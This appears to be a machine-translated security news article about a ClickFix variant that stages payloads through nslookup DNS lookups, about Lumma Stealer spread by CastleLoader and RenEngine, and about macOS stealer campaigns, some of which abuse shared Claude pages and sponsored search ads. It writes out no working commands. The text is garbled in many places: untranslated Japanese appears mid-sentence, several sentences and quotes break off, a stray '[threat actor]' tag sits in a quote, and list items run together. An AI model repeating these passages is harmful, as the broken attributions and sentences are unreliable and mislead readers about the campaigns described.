Microsoft has revealed details of a new version of its ClickFix social engineering tactic in which attackers trick unsuspecting users into running a command that performs a Domain Name System (DNS) lookup to retrieve the next stage payload.
Specifically, this attack uses the “nslookup” (short for nameserver lookup) command to[ファイル名を指定して実行]It relies on performing custom DNS lookups that are triggered via a dialog.
ClickFix is an increasingly popular technique traditionally delivered via phishing, malvertising, or drive-by download schemes, and is often[ファイル名を指定して実行]Executing a command through a dialog or macOS Terminal app redirects the target to a fake landing page that hosts a fake CAPTCHA verification or instructions to address an issue that does not exist on the computer.
This attack method has become popular over the past two years because it relies on victims infecting their machines with malware, which allows attackers to bypass security controls. ClickFix has been so effective that it has spawned several variants, including FileFix, JackFix, ConsentFix, CrashFix, and GlitchFix.
“In modern DNS-based staging with ClickFix, the first command is executed via cmd.exe and performs a DNS lookup against a hard-coded external DNS server rather than the system’s default resolver,” the Microsoft Threat Intelligence team said in a series of posts about X. “The output is filtered to extract the ‘Name:’ DNS response, which is then executed as the second stage payload.”
Microsoft says this new variation of ClickFix uses DNS as a “lightweight staging or signaling channel” that allows threat actors to reach the infrastructure they control, as well as build a new layer of validation before executing second-stage payloads.
“Using DNS in this manner reduces reliance on traditional web requests and allows malicious activity to be mixed in with normal network traffic,” the Windows maker added.
The downloaded payload then begins an attack chain that leads to the download of a ZIP archive from an external server (‘azwsappdev’).[.]com”) and is executed to perform reconnaissance, run detection commands, and drop a Visual Basic Script (VBScript) that launches ModeloRAT, a Python-based remote access Trojan previously distributed through CrashFix.
To establish persistence, a Windows shortcut (LNK) file pointing to the VBScript is created in the Windows startup folder and the malware is automatically launched each time the operating system starts.
The disclosure comes as Bitdefender warns of a spike in Lumma Stealer activity driven by ClickFix-style fake CAPTCHA campaigns deploying an AutoIt version of CastleLoader, a malware loader associated with a threat actor codenamed GrayBravo (formerly TAG-150).
CastleLoader has built-in checks to verify the presence of virtualization software and certain security programs before decrypting and launching stealer malware in memory. Outside of ClickFix, websites promoting cracked software and pirated movies serve as bait for CastleLoader-based attack chains, tricking users into downloading malicious installers and executable files disguised as MP4 media files.
Other CastleLoader campaigns used websites promising downloads of cracked software as a springboard to distribute fake NSIS installers that also ran obfuscated VBA scripts before running an AutoIt script to load Lumma Stealer. The VBA loader is designed to perform scheduled tasks that guarantee persistence.
“Despite extensive law enforcement sabotage in 2025, Lumma Stealer’s operations continued and demonstrated resilience by quickly migrating to a new hosting provider and adapting alternative loaders and delivery techniques,” the Romanian cybersecurity firm said. “At the core of many of these campaigns is CastleLoader, which plays a central role in helping LummaStealer spread through the distribution chain.”
Interestingly, one of the domains on CastleLoader’s infrastructure (‘testdomain123123’)[.]This indicates that the operators of the two malware families are working together or sharing a service provider. The majority of Lumma Stealer infections have been recorded in India, followed by France, the United States, Spain, Germany, Brazil, Mexico, Romania, Italy, and Canada.
“ClickFix’s effectiveness lies in its exploitation of procedural reliability, not technical vulnerabilities,” Bitdefender said. “The instructions resemble troubleshooting steps and validation workarounds that users may have encountered before. As a result, victims are often unaware that they are manually running arbitrary code on their systems.”
CastleLoader is not the only loader used to distribute Lumma Stealer. Campaigns observed as early as March 2025 utilized another loader called RenEngine Loader, which spread malware under the guise of game cheats and pirated software such as the CorelDRAW graphics editor. In these attacks, the loader deploys the Lumma Stealer on behalf of a secondary loader named Hijack Loader.
According to Kaspersky data, the RenEngine Loader attack has primarily affected users in Russia, Brazil, Turkey, Spain, Germany, Mexico, Algeria, Egypt, Italy, and France since March 2025.
This development coincides with the emergence of various campaigns using social engineering lures such as ClickFix to deliver various stealers and malware loaders.
A macOS campaign using phishing and malvertising strategies to deliver Odyssey Stealer, a rebrand of Poseidon Stealer. It is itself a fork of Atomic macOS Stealer (AMOS). The stealer steals credentials and data from 203 browser wallet extensions and 18 desktop wallet applications to facilitate cryptocurrency theft. “Beyond credential theft, Odyssey operates as a complete remote access Trojan,” Censys said. “The persistent LaunchDaemon polls the C2 every 60 seconds for commands and supports SOCKS5 proxies for arbitrary shell execution, reinfection, and tunneling traffic through the victim machine.” ClickFix attack chain targeting Windows systems. It uses a fake CAPTCHA verification page on a legitimate website to trick users into running a PowerShell command that deploys the StealC information stealer. An email phishing campaign that uses a malicious SVG file contained within a password-protected ZIP archive to instruct victims to run PowerShell commands using ClickFix. Finally, an open source .NET infostealer called Stealerium will be deployed. Campaigns deploying Atomic Stealer and MacSync Stealer by abusing the public sharing capabilities of generative artificial intelligence (AI) services such as Anthropic Claude to stage malicious ClickFix instructions on how to perform various tasks on macOS (such as an “online DNS resolver”) and distribute these links through sponsored results in search engines such as Google. A campaign that redirects users searching for “macOS cli disk space analyzer” to a fake Medium article impersonating Apple’s support team, tricking users into executing ClickFix instructions that deliver the next stage stealer payload from an external server called raxelpak.[.]com.” “C2 domain raxelpak[.]MacPaw’s Moonlock Lab said, “The URL history of com dated back to 2021 and appeared to host an e-commerce site for safety workwear,” adding, “We do not know if the domain was hijacked or simply expired and re-registered.” [threat actor] “It’s not clear, but it fits into a broader pattern of leveraging old domains with existing reputations to evade detection.” A variation on the same campaign, which installs Homebrew and steps through ClickFix’s instructions to install stealer malware on links associated with Claude and Evernote through sponsored search results, “advertises a genuine, recognized domain (claude.ai), rather than an spoofed or typographical squat site. Clicking on the ad will take you to a genuine, crooked page,” AdGuard said. Phishing copy. The result is clear: Google Ads + a well-known and trusted platform + technology users with significant downstream impact = powerful malware distribution vector. macOS email phishing campaign that prompts recipients to download and run an AppleScript file to address compatibility issues. This results in the introduction of another AppleScript designed to steal credentials and obtain additional JavaScript payloads. Malware does not grant permissions to itself. “Instead, it forges the TCC authentication of trusted Apple-signed binaries (terminal, osascript, script editor, and bash) and performs malicious actions through these binaries, inheriting their privileges,” Darktrace said. ClearFake campaigns use fake CAPTCHAs to lure compromised WordPress sites, triggering the execution of HTML application (HTA) files, and deploying Lumma Stealer. This campaign uses a malicious JavaScript injection, a technique known as EtherHiding, to execute a contract hosted on the BNB Smart Chain and retrieve an unknown payload hosted on GitHub. EtherHiding offers several advantages to attackers, making it more resilient to takedown efforts as the blockchain is immutable and decentralized.
A recent analysis published by Flare found that threat actors are increasingly targeting Apple macOS using information theft and sophisticated tools.
“Nearly all macOS thieves prioritize stealing cryptocurrencies above all else,” the company said. “This laser focus reflects an economic reality: Cryptocurrency users disproportionately use Macs, which often hold significant value in software wallets. Unlike bank accounts, cryptocurrency transactions are irreversible. Once a seed phrase is compromised, funds are irretrievably gone forever.”
“The assumption that ‘Macs are virus-free’ is not only outdated, it’s actually dangerous. Organizations with Mac users need detection capabilities for macOS-specific TTPs, such as unsigned applications requesting passwords, anomalous terminal activity, connections to blockchain nodes for non-financial purposes, and data leakage patterns targeting keychain or browser storage.”
Source link
